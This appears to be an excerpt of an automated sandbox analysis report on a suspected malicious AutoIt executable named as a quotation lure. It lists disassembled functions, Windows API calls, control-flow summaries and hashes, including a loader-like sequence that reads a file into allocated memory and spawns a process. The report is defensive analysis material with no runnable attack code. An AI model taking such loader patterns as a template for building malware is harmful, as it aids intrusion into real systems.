                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                    • API String ID: 98802146-2727554177
                                                                                                                    • Opcode ID: 395d083aa15110e54c6cb6026334d02622be80f47af386ca1841d3dcaa50d9fd
                                                                                                                    • Instruction ID: b83c8b2c42a7ba7f3ef5034bc958b3db98dcfce79656ddea4240d5e6487666ff
                                                                                                                    • Opcode Fuzzy Hash: 395d083aa15110e54c6cb6026334d02622be80f47af386ca1841d3dcaa50d9fd
                                                                                                                    • Instruction Fuzzy Hash: CA71A1B14043499EC314DF69DC829ABBBECFF85750F40042EF54597161EB789A88EFA2
                                                                                                                    Function 00F12B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00F12B8E
                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00F12B9D
                                                                                                                    • LoadIconW.USER32(00000063), ref: 00F12BB3
                                                                                                                    • LoadIconW.USER32(000000A4), ref: 00F12BC5
                                                                                                                    • LoadIconW.USER32(000000A2), ref: 00F12BD7
                                                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F12BEF
                                                                                                                    • RegisterClassExW.USER32(?), ref: 00F12C40
                                                                                                                      • Part of subcall function 00F12CD4: GetSysColorBrush.USER32(0000000F), ref: 00F12D07
                                                                                                                      • Part of subcall function 00F12CD4: RegisterClassExW.USER32(00000030), ref: 00F12D31
                                                                                                                      • Part of subcall function 00F12CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F12D42
                                                                                                                      • Part of subcall function 00F12CD4: InitCommonControlsEx.COMCTL32(?), ref: 00F12D5F
                                                                                                                      • Part of subcall function 00F12CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F12D6F
                                                                                                                      • Part of subcall function 00F12CD4: LoadIconW.USER32(000000A9), ref: 00F12D85
                                                                                                                      • Part of subcall function 00F12CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F12D94
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                                    • API String ID: 423443420-4155596026
                                                                                                                    • Opcode ID: 6a9b33e408fed3043f8bcdeb19de5974f8e908b5af22a2c5dba4f55c41fc50c9
                                                                                                                    • Instruction ID: 2af520d5c4423c9b0c3a1c5b64128af7c1ebdb4f27316455ade0a86dd0dc5d11
                                                                                                                    • Opcode Fuzzy Hash: 6a9b33e408fed3043f8bcdeb19de5974f8e908b5af22a2c5dba4f55c41fc50c9
                                                                                                                    • Instruction Fuzzy Hash: E7212CB4E0035CAFDB109FA6EC95AAE7FB4FB48B50F04001AF600AA7A0D7B11540EF90
                                                                                                                    Function 00F13170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 443 f13170-f13185 444 f131e5-f131e7 443->444 445 f13187-f1318a 443->445 444->445 446 f131e9 444->446 447 f131eb 445->447 448 f1318c-f13193 445->448 449 f131d0-f131d8 DefWindowProcW 446->449 450 f131f1-f131f6 447->450 451 f52dfb-f52e23 call f118e2 call f2e499 447->451 452 f13265-f1326d PostQuitMessage 448->452 453 f13199-f1319e 448->453 454 f131de-f131e4 449->454 456 f131f8-f131fb 450->456 457 f1321d-f13244 SetTimer RegisterWindowMessageW 450->457 487 f52e28-f52e2f 451->487 455 f13219-f1321b 452->455 459 f131a4-f131a8 453->459 460 f52e7c-f52e90 call f7bf30 453->460 455->454 462 f13201-f13214 KillTimer call f130f2 call f13c50 456->462 463 f52d9c-f52d9f 456->463 457->455 465 f13246-f13251 CreatePopupMenu I_RpcFreeBuffer 457->465 466 f52e68-f52e77 call f7c161 459->466 467 f131ae-f131b3 459->467 460->455 480 f52e96 460->480 462->455 472 f52dd7-f52df6 MoveWindow 463->472 473 f52da1-f52da5 463->473 468 f13253-f13263 call f1326f 465->468 466->455 469 f52e4d-f52e54 467->469 470 f131b9-f131be 467->470 468->455 469->449 483 f52e5a-f52e63 call f70ad7 469->483 470->468 479 f131c4-f131ca 470->479 472->455 481 f52da7-f52daa 473->481 482 f52dc6-f52dd2 SetFocus 473->482 479->449 479->487 480->449 481->479 488 f52db0-f52dc1 call f118e2 481->488 482->455 483->449 487->449 491 f52e35-f52e48 call f130f2 call f13837 487->491 488->455 491->449
                                                                                                                    APIs
                                                                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00F1316A,?,?), ref: 00F131D8
                                                                                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,00F1316A,?,?), ref: 00F13204
                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F13227
                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00F1316A,?,?), ref: 00F13232
                                                                                                                    • CreatePopupMenu.USER32 ref: 00F13246
                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00F13267
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                    • String ID: TaskbarCreated
                                                                                                                    • API String ID: 129472671-2362178303
                                                                                                                    • Opcode ID: c377890cba860f52b496fb33b514aed2264f9f9357e51ad6459d3805b4b8781c
                                                                                                                    • Instruction ID: 636be5515488bb3a1f2ae2571f31342d39366c4dedb21e6f06b70397c5ad683d
                                                                                                                    • Opcode Fuzzy Hash: c377890cba860f52b496fb33b514aed2264f9f9357e51ad6459d3805b4b8781c
                                                                                                                    • Instruction Fuzzy Hash: AD414C32B40288BBDB156B79DD4DBFD3659FB06360F040125F902DA1A2DB758EC0B7A1
                                                                                                                    Function 015FD658 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 499 15fd658-15fd6aa call 15fd558 CreateFileW 502 15fd6ac-15fd6ae 499->502 503 15fd6b3-15fd6c0 499->503 504 15fd80c-15fd810 502->504 506 15fd6d3-15fd6ea VirtualAlloc 503->506 507 15fd6c2-15fd6ce 503->507 508 15fd6ec-15fd6ee 506->508 509 15fd6f3-15fd719 CreateFileW 506->509 507->504 508->504 510 15fd73d-15fd757 ReadFile 509->510 511 15fd71b-15fd738 509->511 513 15fd77b-15fd77f 510->513 514 15fd759-15fd776 510->514 511->504 516 15fd781-15fd79e 513->516 517 15fd7a0-15fd7b7 WriteFile 513->517 514->504 516->504 518 15fd7b9-15fd7e0 517->518 519 15fd7e2-15fd807 CloseHandle VirtualFree 517->519 518->504 519->504
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 015FD69D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1361089658.00000000015FC000.00000040.00000020.00020000.00000000.sdmp, Offset: 015FC000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_15fc000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                    • Instruction ID: dd6b286a5afd53c19d106a979673c773ed75c5d8649bba8f5c9381b0540c0320
                                                                                                                    • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                    • Instruction Fuzzy Hash: 4E51C675A50248BBEB60DFE4CC49FDE7BB8BF48701F108958F61AEF180DA7496448B64
                                                                                                                    Function 00F12C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 539 f12c63-f12cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                    APIs
                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F12C91
                                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F12CB2
                                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00F11CAD,?), ref: 00F12CC6
                                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00F11CAD,?), ref: 00F12CCF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CreateShow
                                                                                                                    • String ID: AutoIt v3$edit
                                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                                    • Opcode ID: 1d77efcbe94a056e81a2eb8148c298537651410a56b0c4d79a0b14c31b05ad75
                                                                                                                    • Instruction ID: adc431002a4ec24a83f9557b21874629043ef246781918de4c79d106525406c4
                                                                                                                    • Opcode Fuzzy Hash: 1d77efcbe94a056e81a2eb8148c298537651410a56b0c4d79a0b14c31b05ad75
                                                                                                                    • Instruction Fuzzy Hash: 84F0DAB55402D87EEB311717AC88E773EBDE7CBF50B00005AF900AB5A0C6721851FAB1
                                                                                                                    Function 015FF108 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 654 15ff108-15ff22d call 15fcd38 call 15feff8 CreateFileW 661 15ff22f 654->661 662 15ff234-15ff244 654->662 663 15ff301-15ff306 661->663 665 15ff24b-15ff265 VirtualAlloc 662->665 666 15ff246 662->666 667 15ff26c-15ff283 ReadFile 665->667 668 15ff267 665->668 666->663 669 15ff287-15ff29c call 15fdda8 667->669 670 15ff285 667->670 668->663 672 15ff2a1-15ff2db call 15ff038 call 15fdff8 669->672 670->663 677 15ff2dd-15ff2f2 call 15ff088 672->677 678 15ff2f7-15ff2ff 672->678 677->678 678->663
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 015FEFF8: Sleep.KERNELBASE(000001F4), ref: 015FF009
                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015FF223
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1361089658.00000000015FC000.00000040.00000020.00020000.00000000.sdmp, Offset: 015FC000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_15fc000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFileSleep
                                                                                                                    • String ID: 2F84QIWUO8402KG97H4AJS3F7NBV
                                                                                                                    • API String ID: 2694422964-1596355192
                                                                                                                    • Opcode ID: b0c1f41a35b06686610917fd4522cad491b9c7ed3992609d274c12db0ee0b631
                                                                                                                    • Instruction ID: e99b2c43a3312d289f01dd4eb2134676e0bd763040e18fbb9a9e17a1d1ba347f
                                                                                                                    • Opcode Fuzzy Hash: b0c1f41a35b06686610917fd4522cad491b9c7ed3992609d274c12db0ee0b631
                                                                                                                    • Instruction Fuzzy Hash: 1551A471D04289DAEF12D7A4C858BEEBFB8AF15304F04419DE6487B2C1D7B90B49CB65
                                                                                                                    Function 00F13B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 717 f13b1c-f13b27 718 f13b99-f13b9b 717->718 719 f13b29-f13b2e 717->719 721 f13b8c-f13b8f 718->721 719->718 720 f13b30-f13b48 RegOpenKeyExW 719->720 720->718 722 f13b4a-f13b69 RegQueryValueExW 720->722 723 f13b80-f13b8b RegCloseKey 722->723 724 f13b6b-f13b76 722->724 723->721 725 f13b90-f13b97 724->725 726 f13b78-f13b7a 724->726 727 f13b7e 725->727 726->727 727->723
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00F13B0F,SwapMouseButtons,00000004,?), ref: 00F13B40
                                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00F13B0F,SwapMouseButtons,00000004,?), ref: 00F13B61
                                                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00F13B0F,SwapMouseButtons,00000004,?), ref: 00F13B83
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                    • String ID: Control Panel\Mouse
                                                                                                                    • API String ID: 3677997916-824357125
                                                                                                                    • Opcode ID: addff0664ff5f7f9c664d7a05a5ee50760040429bcc2121877202f7c92b3a0aa
                                                                                                                    • Instruction ID: a68cfb62dc82f1ff4fc304210acb5ab8610a449c6db158da9e270f656d95a44b
                                                                                                                    • Opcode Fuzzy Hash: addff0664ff5f7f9c664d7a05a5ee50760040429bcc2121877202f7c92b3a0aa
                                                                                                                    • Instruction Fuzzy Hash: 9F112AB5514208FFDB20CFA5DC44AEFBBB8EF45754B108459A805D7110E2319E80A7A0
                                                                                                                    Function 00F1DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • Variable must be of type 'Object'., xrefs: 00F632B7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Variable must be of type 'Object'.
                                                                                                                    • API String ID: 0-109567571
                                                                                                                    • Opcode ID: f43153ffa8923c76e2cfbe5bed71fb3c0389cf80d13f488539aa65db1b6d21a5
                                                                                                                    • Instruction ID: 55f3d0fee54423652e9015185545973c33c0fe06317cc22a6f1c9e16e6fc7ea7
                                                                                                                    • Opcode Fuzzy Hash: f43153ffa8923c76e2cfbe5bed71fb3c0389cf80d13f488539aa65db1b6d21a5
                                                                                                                    • Instruction Fuzzy Hash: CCC27975E00215CFCB24CF58C880BADB7B1BF18320F248569ED56AB291D775ED82EB91
                                                                                                                    Function 00F13923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1238 f13923-f13939 1239 f13a13-f13a17 1238->1239 1240 f1393f-f13954 call f16270 1238->1240 1243 f53393-f533a2 LoadStringW 1240->1243 1244 f1395a-f13976 call f16b57 1240->1244 1246 f533ad-f533b6 1243->1246 1250 f533c9-f533e5 call f16350 call f13fcf 1244->1250 1251 f1397c-f13980 1244->1251 1248 f13994-f13a0e call f32340 call f13a18 call f34983 Shell_NotifyIconW call f1988f 1246->1248 1249 f533bc-f533c4 call f1a8c7 1246->1249 1248->1239 1249->1248 1250->1248 1264 f533eb-f53409 call f133c6 call f13fcf call f133c6 1250->1264 1251->1246 1253 f13986-f1398f call f16350 1251->1253 1253->1248 1264->1248
                                                                                                                    APIs
                                                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F533A2
                                                                                                                      • Part of subcall function 00F16B57: _wcslen.LIBCMT ref: 00F16B6A
                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F13A04
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                    • String ID: Line:
                                                                                                                    • API String ID: 2289894680-1585850449
                                                                                                                    • Opcode ID: d023eca7b2301bf2e7dc1c56e13378f2a943308bd39e7e1a105a04d5604cea85
                                                                                                                    • Instruction ID: 9ea926ef1b92a2300f8ef346a3261b59f3ede2e8e63ed87f05a20c103ee1b14c
                                                                                                                    • Opcode Fuzzy Hash: d023eca7b2301bf2e7dc1c56e13378f2a943308bd39e7e1a105a04d5604cea85
                                                                                                                    • Instruction Fuzzy Hash: EF31C671408344AED725EB20DC45FEFB7D8AF44720F00452AF59993191DF789689EBC2
                                                                                                                    Function 00F2FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1274 f2fddb-f2fdde 1275 f2fded-f2fdf0 call f3ea0c 1274->1275 1277 f2fdf5-f2fdf8 1275->1277 1278 f2fde0-f2fdeb call f34ead 1277->1278 1279 f2fdfa-f2fdfb 1277->1279 1278->1275 1282 f2fdfc-f2fe00 1278->1282 1283 f2fe06-f3066d call f3059c call f332a4 1282->1283 1284 f3066e-f30690 call f305cf call f332a4 1282->1284 1283->1284 1293 f30692 1284->1293 1294 f30697 1284->1294 1293->1294
                                                                                                                    APIs
                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00F30668
                                                                                                                      • Part of subcall function 00F332A4: RaiseException.KERNEL32(?,?,?,00F3068A,?,00FE1444,?,?,?,?,?,?,00F3068A,00F11129,00FD8738,00F11129), ref: 00F33304
                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00F30685
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                    • String ID: Unknown exception
                                                                                                                    • API String ID: 3476068407-410509341
                                                                                                                    • Opcode ID: 1d51f19e7d5be29c02806b05e98be2e3eba29a72943c9b05f509efa67d471e4d
                                                                                                                    • Instruction ID: 027d44a78bd18a5cb00105a13659a00c0094f9480c1e416cab69c947ce48ec2f
                                                                                                                    • Opcode Fuzzy Hash: 1d51f19e7d5be29c02806b05e98be2e3eba29a72943c9b05f509efa67d471e4d
                                                                                                                    • Instruction Fuzzy Hash: 76F0C23490020DB7CB00F6A4EC56D9E777C9E00370FA04532B824D6596EF75EA6AF981
                                                                                                                    Function 015FDD38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 015FDD7D
                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 015FDD9C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1361089658.00000000015FC000.00000040.00000020.00020000.00000000.sdmp, Offset: 015FC000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_15fc000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CreateExit
                                                                                                                    • String ID: D
                                                                                                                    • API String ID: 126409537-2746444292
                                                                                                                    • Opcode ID: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
                                                                                                                    • Instruction ID: 3d76bc23b33d572fc201eefb61ef30f62c5807e7d91c69a89f685401cad75a4d
                                                                                                                    • Opcode Fuzzy Hash: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
                                                                                                                    • Instruction Fuzzy Hash: 32F0C976540249ABDB60EFE0CC49FEE7778BB44701F408909BB0A9A180DA7496088B61
                                                                                                                    Function 00F97F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00F982F5
                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00F982FC
                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 00F984DD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 146820519-0
                                                                                                                    • Opcode ID: 6b808b310a74b0e5d4846e18be48b8838d5c7704ccf55b66d3ee5f3b3b9cbd18
                                                                                                                    • Instruction ID: e3eefad2e4edf5d3ccd0a2defd1e7ea7a34bb2d2a5a6af9fdc055dfec9fb5124
                                                                                                                    • Opcode Fuzzy Hash: 6b808b310a74b0e5d4846e18be48b8838d5c7704ccf55b66d3ee5f3b3b9cbd18
                                                                                                                    • Instruction Fuzzy Hash: E7127C71A083019FDB14DF28C484B6ABBE5FF85364F04895DE8898B252CB35ED46DF92
                                                                                                                    Function 00F110F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F11BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F11BF4
                                                                                                                      • Part of subcall function 00F11BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00F11BFC
                                                                                                                      • Part of subcall function 00F11BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F11C07
                                                                                                                      • Part of subcall function 00F11BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F11C12
                                                                                                                      • Part of subcall function 00F11BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00F11C1A
